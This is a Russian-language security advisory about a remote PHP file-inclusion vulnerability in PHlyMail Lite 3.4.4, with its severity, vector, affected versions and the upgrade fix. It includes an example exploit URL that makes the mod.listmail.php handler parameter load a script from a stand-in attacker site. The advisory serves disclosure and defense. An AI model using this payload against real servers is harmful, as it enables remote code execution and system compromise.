PHP-инклюдинг в PHlyMail Lite

Дата публикации:
22.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
2633
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHlyMail Lite 3.x
Уязвимые версии: PHlyMail Lite 3.4.4 (Build 3.04.04), возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "_PM_[path][handler]" в сценарии handlers/email/mod.listmail.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path]
[handler]=[http://www.myevilsite.com/evil_scripts.txt]

URL производителя: phlymail.de/en/phlymail/lite/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability

или введите имя

CAPTCHA